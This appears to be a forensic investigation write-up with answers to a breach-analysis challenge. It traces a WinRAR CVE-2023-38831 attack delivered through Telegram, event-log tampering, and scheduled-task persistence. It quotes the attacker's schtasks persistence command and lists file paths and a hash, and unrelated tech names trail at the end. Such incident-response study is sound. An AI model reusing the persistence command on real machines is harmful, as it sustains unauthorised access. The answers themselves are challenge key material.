Q1 In your investigation into the FinTrust Bank breach, you found an application that was the entry point for the attack. Which application was used to download the malicious file?
after investigation in files we found a file called sans sec401 after geting a hash 1FBD3CA9FCFEA5AAC390EA38FF818CC9 and check it on virus total we get it is a malicious file
i uploaded the file also in any.run sandbox to get more details about a file
so the application was used to download the malicious file is telegram
C\Users\Administrator\Downloads\Telegram Desktop\SANS SEC401
Q2 Finding out when the attack started is critical. What is the UTC timestamp for when the suspicious file was first downloaded?
in this Question we can use MFT file (MFT file have all information about os which download and more info )
to get info form MFT file we will use two tools first one to convert the file to csv file and the second to display the file
1 - MFTcmd 2- timeline explorer
the time is 2024-02-03 07:33:20
Q3 Knowing which vulnerability was exploited is key to improving security. What is the CVE identifier of the vulnerability used in this attack?
in this question threat intelligence helped us to detect a cve using two website 1- virustotal 2-any.run
CVE-2023-38831 WinRAR before 6.23 allows attackers to execute arbitrary code .
to fix this vuln we have to update winrar to latest version above 6.23
Q4 In examining the downloaded archive, you noticed a file in with an odd extension indicating it might be malicious. What is the name of this file?
the file with odd ext is SANS SEC401.pdf .cmd inside SANS SEC401.rar
Q5 Uncovering the methods of payload delivery helps in understanding the attack vectors used. What is the URL used by the attacker to download the second stage of the malware?
in this question we can get it using three method
first if we try to open the file with extention cmd in isolated OS we will the url for the second stage of the malware
second we can use threat intelligence to see the command wrote in cmd with the malicious file using any.run
third we can use two to and two tools will give us information wireshark - FakeNet we will see the requstes from the milicious website and gain it
Q6 To further understand how attackers cover their tracks, identify the script they used to tamper with the event logs. What is the script name?
to see the event logs stored in the sys C\Windows\System32\winevt\logs
to see the events we will use application Eventlog explorer
then now we need to open windows poweshell to see what is inside it
Eventlogs.ps1
Q7 Knowing when unauthorized actions happened helps in understanding the attack. What is the UTC timestamp for when the script that tampered with event logs was run?
we will see the time here but we need -2 to get utc time
2024-02-03 07:38:01
Q8 We need to identify if the attacker maintained access to the machine. What is the command used by the attacker for persistence?
there are more than one persistence technique and all of them will stored in req
the most common will be in ( autorun - task scheduler - ....) and more
so lets search about it .
then i found it HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\whoisthebaba
that mean the attacker use Schedule tec to get persistence on the sys
if we look at the command wrote in the cmd using any.run threat intelligence sandobx
we will found it schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST
To understand the attacker's data exfiltration strategy, we need to locate where they stored their harvested data. What is the full path of the file storing the data collected by one of the attacker's tools in preparation for data exfiltration?
while searching i found a file with txt extention have some info about which ip is alive that mean the attacker used tools for ping seep to see which ip is alive
to do lateral movement and attack other OS in the same network
C:\Users\Administrator\AppData\Local\Temp\BL4356.txt
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent